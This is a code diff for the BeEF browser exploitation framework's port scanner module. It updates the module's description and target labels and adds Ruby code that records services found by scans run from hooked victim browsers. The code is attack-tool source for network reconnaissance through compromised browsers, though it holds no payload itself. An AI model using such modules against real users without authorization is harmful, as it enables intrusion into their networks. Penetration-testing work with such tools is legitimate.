diff --git a/modules/network/port_scanner/config.yaml b/modules/network/port_scanner/config.yaml
index 49d0f094a..262bbd9d8 100644
--- a/modules/network/port_scanner/config.yaml
+++ b/modules/network/port_scanner/config.yaml
@@ -9,8 +9,8 @@ beef:
enable: true
category: "Network"
name: "Port Scanner"
- description: "Scan ports in a given hostname, using WebSockets, CORS and img tags. It uses the three methods to avoid blocked ports or Same Origin Policy."
+ description: "Scan ports in a given hostname, using WebSockets, CORS and img tags. It uses the three methods to avoid blocked ports or Same Origin Policy.
Note: The user may see authentication popups in the event any of the target ports are web servers using HTTP authentication."
authors: ["javier.marcos"]
target:
- working: ["FF", "C"]
+ user_notify: ["FF", "C"]
not_working: ["S", "O", "IE"]
diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb
index ab331e20d..afb9c18b1 100644
--- a/modules/network/port_scanner/module.rb
+++ b/modules/network/port_scanner/module.rb
@@ -29,5 +29,23 @@ class Port_scanner < BeEF::Core::Command
content['fail'] = 'No open ports have been found.'
end
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^ip=([\d\.]+)&port=(CORS|WebSocket|HTTP): Port ([\d]+) is OPEN (.*)$/
+ ip = $1
+ port = $3
+ service = $4
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => service, :cid => cid)
+ r.save
+ end
+ end
+
+ end
+
end
end